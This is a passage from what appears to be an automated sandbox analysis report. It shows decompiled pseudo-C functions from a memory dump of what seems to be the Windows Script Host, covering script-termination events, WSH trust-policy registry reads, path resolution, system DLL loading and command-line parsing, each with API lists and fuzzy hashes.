                                                        						_t123 =  *((intOrPtr*)( *_t81 + 0x14))(_t81, 0xb81804,  &_v32, 1, 0x400,  &_v28);
                                                        						__eflags = _t123;
                                                        						if(_t123 < 0) {
                                                        							__eflags = _t123 - 0x80020006;
                                                        							if(_t123 == 0x80020006) {
                                                        								L4:
                                                        								_t123 = 0;
                                                        								goto L5;
                                                        							}
                                                        							goto L5;
                                                        						}
                                                        						_t83 = _v16;
                                                        						_v52 = 0;
                                                        						_v48 = 0;
                                                        						_v44 = 0;
                                                        						_v40 = 0;
                                                        						_t84 =  *((intOrPtr*)( *_t83 + 0x18))(_t83, _v28, 0xb81804, 0x400, 1,  &_v52, 0, 0, 0);
                                                        						_t123 = _t84;
                                                        						__eflags = _t123;
                                                        						if(_t123 >= 0) {
                                                        							goto L4;
                                                        						}
                                                        						goto L5;
                                                        					}
                                                        					goto L4;
                                                        				}
                                                        				if(_t103 != 0x8004fffd) {
                                                        					__eflags = _t103 - 0x8004fffe;
                                                        					if(_t103 == 0x8004fffe) {
                                                        						_t123 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x2c)))) + 0x20))();
                                                        						goto L5;
                                                        					}
                                                        					_t87 = _v76;
                                                        					_a4 = _t87;
                                                        					__eflags = _t87;
                                                        					if(_t87 == 0) {
                                                        						L19:
                                                        						_t123 = E00B8F3F0(_t103,  &_v20);
                                                        						__eflags = _t123;
                                                        						if(_t123 < 0) {
                                                        							goto L5;
                                                        						}
                                                        						_t122 = _a8;
                                                        						_a4 = _v20;
                                                        						L21:
                                                        						_t92 =  *((intOrPtr*)( *_t122 + 0x10))(_t122,  &_v36,  &_v12,  &_v24);
                                                        						__eflags = _t92;
                                                        						if(_t92 < 0) {
                                                        							_t29 =  &_v24;
                                                        							 *_t29 = _v24 | 0xffffffff;
                                                        							__eflags =  *_t29;
                                                        							_v12 = 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *_t122 + 0x14))(_t122,  &_v8);
                                                        						}
                                                        						__eflags = _v8;
                                                        						if(__eflags == 0) {
                                                        							_v8 = E00B9220B( *((intOrPtr*)(_t125 + 0x40)), __eflags, _v12);
                                                        						}
                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x2c)))) + 0x14))(_v12, _v24 + 1, _v80, _a4, _v8, _v56, 0);
                                                        						_t95 =  *((intOrPtr*)(_t125 + 0x2c));
                                                        						__eflags =  *(_t95 + 0x23);
                                                        						if( *(_t95 + 0x23) != 0) {
                                                        							E00B90ADF(_t125, _t122,  *((intOrPtr*)(_t125 + 0x40)), _v12);
                                                        						}
                                                        						goto L4;
                                                        					}
                                                        					__eflags =  *_t87;
                                                        					if( *_t87 != 0) {
                                                        						goto L21;
                                                        					}
                                                        					goto L19;
                                                        				}
                                                        				goto L4;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Strings
                                                        • WScript_OnScriptTerminate, xrefs: 00B88CFB
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID: WScript_OnScriptTerminate
                                                        • API String ID: 4071441547-526745235
                                                        • Opcode ID: 34c3d3cd4ed6eef21e47032ae112fd0596c7adad7ffad7ffdaa91208b45bc0e0
                                                        • Instruction ID: bd78ac57a1d09b75ab1e42e94848a25e1f363ba5d746dd06b3642b0de82534a7
                                                        • Opcode Fuzzy Hash: 34c3d3cd4ed6eef21e47032ae112fd0596c7adad7ffad7ffdaa91208b45bc0e0
                                                        • Instruction Fuzzy Hash: 98513D71D00219AFDF14EFA4C8848AEBBFAFF48314B2444ADE516A7260DB31AD41DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 55%
                                                        			E00B91D96(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                        				signed int _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				char* _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v40;
                                                        				char _v44;
                                                        				long _v48;
                                                        				intOrPtr _v64;
                                                        				intOrPtr* _v68;
                                                        				intOrPtr _v72;
                                                        				char _v76;
                                                        				void* _t63;
                                                        				signed int _t66;
                                                        				intOrPtr* _t72;
                                                        				signed int _t73;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t79;
                                                        				intOrPtr* _t83;
                                                        				intOrPtr* _t91;
                                                        				long _t95;
                                                        				intOrPtr* _t101;
                                                        				intOrPtr _t115;
                                                        				intOrPtr* _t117;
                                                        				signed int _t120;
                                                        				intOrPtr* _t121;
                                                        
                                                        				_t91 = _a12;
                                                        				_t120 = 0;
                                                        				_v8 = 0;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_t63 =  *((intOrPtr*)( *_t91 + 0xc))(_t91,  &_v76);
                                                        				if(_t63 >= 0) {
                                                        					_t115 = _a4;
                                                        					if(E00B86529( *((intOrPtr*)(_t115 + 0x10))) != 0) {
                                                        						_t95 = _v48;
                                                        						if(_t95 == 0x80004004) {
                                                        							L24:
                                                        							_t66 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x10)))) + 0x20))();
                                                        							L25:
                                                        							_t120 = _t66;
                                                        							if(_t120 < 0) {
                                                        								L27:
                                                        								_t117 = __imp__#6;
                                                        								 *_t117(_v68);
                                                        								 *_t117(_v72);
                                                        								 *_t117(_v64);
                                                        								 *_t117(_v8);
                                                        								 *_t117(_v16);
                                                        								_t72 = _v12;
                                                        								if(_t72 != 0) {
                                                        									 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                        								}
                                                        								_t73 = _t120;
                                                        								L30:
                                                        								return _t73;
                                                        							}
                                                        							L26:
                                                        							_t120 = 0;
                                                        							goto L27;
                                                        						}
                                                        						if(_t95 == 0x8004fffc) {
                                                        							if( *((intOrPtr*)(_t115 + 0x18)) != 0) {
                                                        								goto L27;
                                                        							}
                                                        							_t75 =  *((intOrPtr*)(_t115 + 0x14));
                                                        							 *((intOrPtr*)(_t115 + 0x18)) = 1;
                                                        							_t120 =  *((intOrPtr*)( *_t75 + 0x14))(_t75);
                                                        							if(_t120 < 0) {
                                                        								goto L27;
                                                        							}
                                                        							_t120 = E00B9054D( *((intOrPtr*)(_t115 + 0x10)),  &_v12);
                                                        							if(_t120 < 0) {
                                                        								goto L27;
                                                        							}
                                                        							_t79 = _v12;
                                                        							_v24 = _v24 & 0x00000000;
                                                        							_v28 = L"WScript_OnScriptTerminate";
                                                        							_t120 =  *((intOrPtr*)( *_t79 + 0x14))(_t79, 0xb81804,  &_v28, 1, 0x400,  &_v24);
                                                        							if(_t120 >= 0) {
                                                        								_t101 = _v12;
                                                        								_v44 = 0;
                                                        								_v40 = 0;
                                                        								_v36 = 0;
                                                        								_v32 = 0;
                                                        								_t66 =  *((intOrPtr*)( *_t101 + 0x18))(_t101, _v24, 0xb81804, 0x400, 1,  &_v44, 0, 0, 0);
                                                        								goto L25;
                                                        							}
                                                        							if(_t120 == 0x80020006) {
                                                        								goto L26;
                                                        							}
                                                        							goto L27;
                                                        						}
                                                        						if(_t95 == 0x8004fffd) {
                                                        							goto L27;
                                                        						}
                                                        						if(_t95 == 0x8004fffe) {
                                                        							goto L24;
                                                        						}
                                                        						_t83 = _v68;
                                                        						if(_t83 == 0 || 0 ==  *_t83) {
                                                        							_t120 = E00B8F3F0(_t95,  &_v16);
                                                        							if(_t120 < 0) {
                                                        								goto L27;
                                                        							}
                                                        							_t121 = _v16;
                                                        							goto L12;
                                                        						} else {
                                                        							_t121 = _t83;
                                                        							L12:
                                                        							_push( &_a12);
                                                        							_push( &_v20);
                                                        							_push(_t91);
                                                        							if( *((intOrPtr*)( *_t91 + 0x10))() < 0) {
                                                        								_v20 = _v20 & 0x00000000;
                                                        								_a12 = _a12 | 0xffffffff;
                                                        							}
                                                        							_push( &_v8);
                                                        							_push(_t91);
                                                        							if( *((intOrPtr*)( *_t91 + 0x14))() < 0) {
                                                        								_v8 = _v8 & 0x00000000;
                                                        							}
                                                        							_t66 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x10)))) + 0x14))(_v20, _a12 + 1, _v72, _t121, _v8, _v48, _a8 & 0x00000001);
                                                        							goto L25;
                                                        						}
                                                        					}
                                                        					_t73 = 0x80004005;
                                                        					goto L30;
                                                        				}
                                                        				return _t63;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F39
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F3E
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F43
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F48
                                                        • SysFreeString.OLEAUT32(?), ref: 00B91F4D
                                                        Strings
                                                        • WScript_OnScriptTerminate, xrefs: 00B91EDA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID: WScript_OnScriptTerminate
                                                        • API String ID: 4071441547-526745235
                                                        • Opcode ID: bdccddd1cd547652fe5821185e2b229bf4ce4d69184c4c0de03763245d8eef2d
                                                        • Instruction ID: 6c08a3fbaa81b859f8c19a61f624f5174fee7b6f6e3f0b9bb23c2313687d8f76
                                                        • Opcode Fuzzy Hash: bdccddd1cd547652fe5821185e2b229bf4ce4d69184c4c0de03763245d8eef2d
                                                        • Instruction Fuzzy Hash: C0517F7190021AAFCF14DFA8C884AAEBBF9FF44750F2449A9E811E7250D730ED41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B83FF7(intOrPtr __ecx, void* __eflags) {
                                                        				char _v5;
                                                        				char _v6;
                                                        				char _v7;
                                                        				char _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				long _v20;
                                                        				intOrPtr _v24;
                                                        				long _t43;
                                                        				intOrPtr _t54;
                                                        				void* _t55;
                                                        				char* _t57;
                                                        
                                                        				_t53 = __ecx;
                                                        				_t58 = L"Software\\Microsoft\\Windows Script Host\\Settings";
                                                        				_v24 = __ecx;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_v7 = 0;
                                                        				_v5 = 0;
                                                        				_v6 = 0;
                                                        				_t43 = E00B83415(__ecx, _t55, 0x80000002, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v12);
                                                        				if(_v12 != 0) {
                                                        					_t43 = E00B832BE(_t55, _v12, L"IgnoreUserSettings",  &_v7);
                                                        				}
                                                        				if(_v7 == 0) {
                                                        					_t43 = E00B83415(_t53, _t55, 0x80000001, _t58, 0x20019,  &_v16);
                                                        				}
                                                        				_t59 = L"TrustPolicy";
                                                        				_t57 = L"UseWINSAFER";
                                                        				if(_v16 == 0) {
                                                        					L8:
                                                        					if(_v12 != 0) {
                                                        						_t43 = E00B8413D(_t55, _v12, _t59,  &_v20);
                                                        						if(_t43 >= 0) {
                                                        							_v5 = 1;
                                                        						}
                                                        					}
                                                        					L10:
                                                        					if(_v6 == 0 && _v12 != 0) {
                                                        						_t43 = E00B832BE(_t55, _v12, _t57,  &_v8);
                                                        						if(_t43 >= 0) {
                                                        							_v6 = 1;
                                                        						}
                                                        					}
                                                        					_t54 = _v24;
                                                        					if(_v5 != 0) {
                                                        						_t43 = _v20;
                                                        						if(_t43 >  *(_t54 + 0x28)) {
                                                        							 *(_t54 + 0x28) = _t43;
                                                        						}
                                                        					}
                                                        					if(_v6 != 0) {
                                                        						_t43 = _v8;
                                                        						 *(_t54 + 0x26) = _t43;
                                                        					}
                                                        					if(_v16 != 0) {
                                                        						_t43 = RegCloseKey(_v16);
                                                        					}
                                                        					if(_v12 != 0) {
                                                        						return RegCloseKey(_v12);
                                                        					}
                                                        					return _t43;
                                                        				}
                                                        				if(E00B8413D(_t55, _v16, L"TrustPolicy",  &_v20) >= 0) {
                                                        					_v5 = 1;
                                                        				}
                                                        				_t43 = E00B832BE(_t55, _v16, _t57,  &_v8);
                                                        				if(_t43 >= 0) {
                                                        					_v6 = 1;
                                                        				}
                                                        				if(_v5 != 0) {
                                                        					goto L10;
                                                        				} else {
                                                        					goto L8;
                                                        				}
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • RegCloseKey.ADVAPI32(00B82238), ref: 00B840F7
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B84101
                                                          • Part of subcall function 00B832BE: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B8331B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                        • API String ID: 1607946009-2293819020
                                                        • Opcode ID: 7182d1512e109dce6ae039d1c47a2bb2652e1b22c524d2f05e39fd14197bae40
                                                        • Instruction ID: 87bd453de9e35d3e93edeacf296207755f0490b21014dfadd70ee39bc4f5a5be
                                                        • Opcode Fuzzy Hash: 7182d1512e109dce6ae039d1c47a2bb2652e1b22c524d2f05e39fd14197bae40
                                                        • Instruction Fuzzy Hash: 36414C71C0528ABADF11FBD588459EFBFF8EF11704F5840EAE644B2121D3354A89DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B83B1E(void* __edx, short* _a4, int _a8, short* _a12, LPWSTR* _a16) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				CHAR* _v16;
                                                        				void* _v32;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t23;
                                                        				signed int _t26;
                                                        				void* _t47;
                                                        				char* _t48;
                                                        				signed int _t49;
                                                        				signed int _t52;
                                                        				char* _t53;
                                                        				intOrPtr _t55;
                                                        
                                                        				_t47 = __edx;
                                                        				_t23 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t23 ^ _t52;
                                                        				_t49 = 0;
                                                        				_t55 =  *0xb97001; // 0x0
                                                        				if(_t55 == 0) {
                                                        					_t48 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                        					if(_t48 == 0) {
                                                        						L3:
                                                        						_t26 = GetLastError();
                                                        						if(_t26 > 0) {
                                                        							_t26 = _t26 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t49 = _t26;
                                                        						L2:
                                                        						return E00B81335(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                        					}
                                                        					E00B8320B(_t25);
                                                        					_v12 = _t53;
                                                        					if(_t53 != 0) {
                                                        						if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t48, 0, 0) == 0) {
                                                        							goto L3;
                                                        						}
                                                        						E00B8320B(_a8);
                                                        						_t48 = _t53;
                                                        						if(GetFullPathNameA(_v12, _a8, _t48,  &_v16) == 0 || MultiByteToWideChar(0, 0, _t48, 0xffffffff, _a12, _a8) == 0) {
                                                        							goto L3;
                                                        						} else {
                                                        							 *_a16 =  &(_a12[MultiByteToWideChar(0, 0, _t48, _v16 - _t48, 0, 0)]);
                                                        							_t49 = 0;
                                                        							goto L2;
                                                        						}
                                                        					}
                                                        					_t49 = 0x8007000e;
                                                        					goto L2;
                                                        				}
                                                        				if(GetFullPathNameW(_a4, _a8, _a12, _a16) == 0) {
                                                        					goto L3;
                                                        				}
                                                        				goto L2;
                                                        			}

                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B83B4F
                                                        • GetLastError.KERNEL32(?,?,?), ref: 00B8954D
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B89579
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorFullLastMultiNamePathWide
                                                        • String ID:
                                                        • API String ID: 1285381999-0
                                                        • Opcode ID: c08c525aca75bd7bdd940175d812f89dc8dd37ab71b6796d03cb18f55f50e0e7
                                                        • Instruction ID: 757645a13ee9f0838dd31aa0e680cdd5accd1dc9a24b8ad44c1aa8ef36d07779
                                                        • Opcode Fuzzy Hash: c08c525aca75bd7bdd940175d812f89dc8dd37ab71b6796d03cb18f55f50e0e7
                                                        • Instruction Fuzzy Hash: 52318FB250014DBF9F11AFA4CC80DBF7BEDEB457A4B1445A9FA21A7160CA31DE11DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 32%
                                                        			E00B8D30C(int* _a4, void* _a8, int _a12, long _a16) {
                                                        				signed int _v8;
                                                        				void _v16;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t15;
                                                        				int _t16;
                                                        				int* _t18;
                                                        				int* _t28;
                                                        				int* _t29;
                                                        				void* _t30;
                                                        				void* _t31;
                                                        				int* _t32;
                                                        				signed int _t33;
                                                        				void* _t34;
                                                        
                                                        				_t15 =  *0xb97004; // 0xbb40e64e
                                                        				_t16 = _t15 ^ _t33;
                                                        				_v8 = _t16;
                                                        				_t32 = _a4;
                                                        				_t31 = _a8;
                                                        				if(_t31 != 0 || _a12 <= 0) {
                                                        					if(_t32 != 0) {
                                                        						 *_t32 =  *_t32 | 0xffffffff;
                                                        					}
                                                        					if(_a12 <= 0x7fffffff) {
                                                        						_t16 = wctomb( &_v16, _a16);
                                                        						if(_t16 >= 0) {
                                                        							if(_t32 != 0) {
                                                        								 *_t32 = _t16;
                                                        							}
                                                        							if(_a12 >= _t16) {
                                                        								if(_t31 != 0) {
                                                        									memcpy(_t31,  &_v16, _t16);
                                                        								}
                                                        								goto L23;
                                                        							} else {
                                                        								if(_t31 != 0 && _a12 > 0) {
                                                        									_t16 = memset(_t31, 0, _a12);
                                                        									_t34 = _t34 + 0xc;
                                                        								}
                                                        								__imp___errno();
                                                        								_push(0x22);
                                                        								goto L8;
                                                        							}
                                                        						}
                                                        						if(_t31 != 0 && _a12 > 0) {
                                                        							_t16 = memset(_t31, 0, _a12);
                                                        						}
                                                        						__imp___errno();
                                                        						_t29 = 0x2a;
                                                        						 *_t16 = _t29;
                                                        						_t18 = _t29;
                                                        					} else {
                                                        						__imp___errno();
                                                        						_push(0x16);
                                                        						L8:
                                                        						_pop(_t28);
                                                        						_push(0);
                                                        						_push(0);
                                                        						_push(0);
                                                        						_push(0);
                                                        						_push(0);
                                                        						_t32 = _t28;
                                                        						 *_t16 = _t28;
                                                        						E00B8CDE6(0, _t28, _t30, _t31, _t32);
                                                        						_t18 = _t32;
                                                        					}
                                                        					goto L24;
                                                        				} else {
                                                        					if(_t32 != 0) {
                                                        						 *_t32 = 0;
                                                        					}
                                                        					L23:
                                                        					_t18 = 0;
                                                        					L24:
                                                        					return E00B81335(_t18, 0, _v8 ^ _t33, _t30, _t31, _t32);
                                                        				}
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _errno$memsetwctomb
                                                        • String ID:
                                                        • API String ID: 3431484887-0
                                                        • Opcode ID: 680a03d0bdb969fdb0c8346dac378fed93662a780cda6412c6e0d74d7295f41a
                                                        • Instruction ID: c3088902c6054a29b9d34c6ea4efa5d9864296ece6f63815a4303bff7f70215b
                                                        • Opcode Fuzzy Hash: 680a03d0bdb969fdb0c8346dac378fed93662a780cda6412c6e0d74d7295f41a
                                                        • Instruction Fuzzy Hash: D1216B72A0134AEBCF207F68ACC54AE7BE9EB54314B1406AFF661971E0DB318941C75B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E00B855CA(void* __ecx, intOrPtr* _a4, signed int* _a8) {
                                                        				char _v5;
                                                        				signed int _t13;
                                                        				intOrPtr* _t16;
                                                        				CHAR* _t17;
                                                        				signed int _t19;
                                                        				struct HINSTANCE__* _t23;
                                                        				CHAR* _t25;
                                                        				void* _t28;
                                                        				intOrPtr _t32;
                                                        				int _t39;
                                                        				signed int _t40;
                                                        
                                                        				 *_a8 =  *_a8 & 0x00000000;
                                                        				_t39 = GetSystemDirectoryA( &_v5, 0);
                                                        				if(_t39 == 0) {
                                                        					_t13 = GetLastError();
                                                        					if(_t13 > 0) {
                                                        						_t13 = _t13 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					_t40 = _t13;
                                                        					L10:
                                                        					return _t40;
                                                        				}
                                                        				_t16 = _a4;
                                                        				_t28 = _t16 + 1;
                                                        				do {
                                                        					_t32 =  *_t16;
                                                        					_t16 = _t16 + 1;
                                                        				} while (_t32 != 0);
                                                        				_t17 = _t16 - _t28;
                                                        				_t34 =  &(_t17[_t39 + 2]);
                                                        				_push( &(_t17[_t39 + 2]));
                                                        				L00B82877();
                                                        				_t25 = _t17;
                                                        				if(_t25 == 0) {
                                                        					_t40 = 0x8007000e;
                                                        					L7:
                                                        					if(_t25 != 0) {
                                                        						_push(_t25);
                                                        						L00B82082();
                                                        					}
                                                        					goto L10;
                                                        				}
                                                        				if(GetSystemDirectoryA(_t25, _t39 + 1) == 0) {
                                                        					L15:
                                                        					_t19 = GetLastError();
                                                        					if(_t19 > 0) {
                                                        						_t19 = _t19 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					_t40 = _t19;
                                                        					goto L7;
                                                        				}
                                                        				E00B85673(_t18 + _t25, _t34 - _t18, E00B855B8);
                                                        				E00B85673(_t18 + _t25 + 1, _t34 - _t18 - 1, _a4);
                                                        				_t23 = LoadLibraryA(_t25);
                                                        				if(_t23 == 0) {
                                                        					goto L15;
                                                        				}
                                                        				 *_a8 = _t23;
                                                        				_t40 = 0;
                                                        				goto L7;
                                                        			}















                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                        • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetLastError.KERNEL32(?,?,?,00B912B8,wintrust.dll,00B905FC,?,?,00000000), ref: 00B88D49
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: DirectorySystem$??2@??3@ErrorLastLibraryLoad
                                                        • String ID:
                                                        • API String ID: 2582802516-0
                                                        • Opcode ID: e0d1418fdf4390ea887cc2e4cc85568a9a3cbb4c6882280400b6d9499a634e38
                                                        • Instruction ID: b08a04a0f4f372b4e21d09c278451f6dd1e85975ba6a8279f13708dbb4ebdeb0
                                                        • Opcode Fuzzy Hash: e0d1418fdf4390ea887cc2e4cc85568a9a3cbb4c6882280400b6d9499a634e38
                                                        • Instruction Fuzzy Hash: A3210132600612ABD7307B69DC89F673BDCEF523A0B4445B9F806DB1B1EE24C905C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E00B820CF() {
                                                        				signed int _v8;
                                                        				short* _v12;
                                                        				char* _v16;
                                                        				signed int _t15;
                                                        				char* _t19;
                                                        				void* _t28;
                                                        				WCHAR* _t30;
                                                        				void* _t37;
                                                        				void* _t40;
                                                        				void* _t41;
                                                        				int _t42;
                                                        				void* _t44;
                                                        				short* _t46;
                                                        				signed int _t50;
                                                        				short* _t51;
                                                        				void* _t52;
                                                        				intOrPtr _t54;
                                                        				void* _t55;
                                                        
                                                        				_t15 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t15 ^ _t50;
                                                        				_push(_t44);
                                                        				_push(_t41);
                                                        				_push(0x7d0);
                                                        				_push(GetModuleHandleA(0));
                                                        				if(E00B82E3A(0, _t41, _t44, _t52) == 0) {
                                                        					_push(1);
                                                        				} else {
                                                        					_t54 =  *0xb97001; // 0x0
                                                        					if(_t54 == 0) {
                                                        						_t19 = GetCommandLineA();
                                                        						_v16 = _t19;
                                                        						_t42 = MultiByteToWideChar(0, 0, _t19, 0xffffffff, 0, 0);
                                                        						E00B8320B(_t42 + _t42);
                                                        						_v12 = _t51;
                                                        						MultiByteToWideChar(0, 0, _v16, 0xffffffff, _v12, _t42);
                                                        						_t43 = _v12;
                                                        					} else {
                                                        						_t30 = GetCommandLineW();
                                                        						_v12 = _t30;
                                                        						_t49 = lstrlenW(_t30) + 1;
                                                        						_t55 = lstrlenW(_t30) + 1;
                                                        						E00B8320B(_t49 + _t49);
                                                        						_t43 = _t51;
                                                        						E00B831BD(_t51, _t49, _v12);
                                                        						_t51 = _t51 + 0xc;
                                                        					}
                                                        					E00B8320B(4 + E00B83495(_t37, _t43, 0) * 4);
                                                        					_t46 = _t51;
                                                        					 *((intOrPtr*)(_t46 + E00B83495(_t37, _t43, _t46) * 4)) = 0;
                                                        					_t28 = E00B82171(0, _t40, _t55, _t27, _t46);
                                                        					E00B85C07();
                                                        					_push(_t28);
                                                        				}
                                                        				ExitProcess();
                                                        			}






















                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,000007D0), ref: 00B820EC
                                                          • Part of subcall function 00B82E3A: InitializeCriticalSection.KERNEL32(00B97034,00B82F08,000000A0,00B820F8,00000000), ref: 00B82E64
                                                          • Part of subcall function 00B82E3A: GetVersionExA.KERNEL32(00000094), ref: 00B82E82
                                                        • GetCommandLineW.KERNEL32(00000000), ref: 00B8210C
                                                        • lstrlenW.KERNEL32(00000000), ref: 00B82116
                                                          • Part of subcall function 00B82171: CoInitialize.OLE32(00000000), ref: 00B821A5
                                                          • Part of subcall function 00B82171: CoUninitialize.OLE32 ref: 00B821EB
                                                          • Part of subcall function 00B85C07: DeleteCriticalSection.KERNEL32(00B97034,00B82165,?,?,?,00000000), ref: 00B934D0
                                                        • ExitProcess.KERNEL32 ref: 00B82166
                                                        • GetCommandLineA.KERNEL32(00000000), ref: 00B877C4
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00B877DA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00B877F4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharCommandCriticalInitializeLineMultiSectionWide$DeleteExitHandleModuleProcessUninitializeVersionlstrlen
                                                        • String ID:
                                                        • API String ID: 1125670335-0
                                                        • Opcode ID: 7404e20b0dd48f8765e25acbfc5b4661de674296701950f053b93f6f263fbde6
                                                        • Instruction ID: 812dd7fa11bfb3b48c103a54df645557bb920ef3dd53452c1111f26df13b8ea4
                                                        • Opcode Fuzzy Hash: 7404e20b0dd48f8765e25acbfc5b4661de674296701950f053b93f6f263fbde6
                                                        • Instruction Fuzzy Hash: 38219FB1805208BBD710BFA49C8EDAF7EFCEB46B60B240595F601A3170DE359D01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E00B9422B() {
                                                        				signed int _v8;
                                                        				char _v16;
                                                        				void* _v20;
                                                        				int _v24;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t14;
                                                        				intOrPtr _t17;
                                                        				long _t23;
                                                        				char* _t25;
                                                        				void* _t27;
                                                        				void* _t30;
                                                        				void* _t31;
                                                        				void* _t33;
                                                        				signed int _t34;
                                                        				signed int _t35;
                                                        				void* _t36;
                                                        				void* _t37;
                                                        
                                                        				_t14 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t14 ^ _t35;
                                                        				_t37 = 0 -  *0xb974cc; // 0x0
                                                        				if(_t37 == 0) {
                                                        					_push(_t33);
                                                        					_t34 = 0;
                                                        					_v24 = 6;
                                                        					if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}", 0, 1,  &_v20) == 0) {
                                                        						_t23 = RegQueryValueExW(_v20, L"Locale", 0, 0,  &_v16,  &_v24);
                                                        						RegCloseKey(_v20);
                                                        						_t31 = _t31;
                                                        						if(_t23 == 0) {
                                                        							while(1) {
                                                        								_push(3);
                                                        								_push( *((intOrPtr*)(0xb942d8 + _t34 * 8)));
                                                        								_t25 =  &_v16;
                                                        								_push(_t25);
                                                        								L00B9528A();
                                                        								_t36 = _t36 + 0xc;
                                                        								if(_t25 == 0) {
                                                        									break;
                                                        								}
                                                        								_t34 = _t34 + 1;
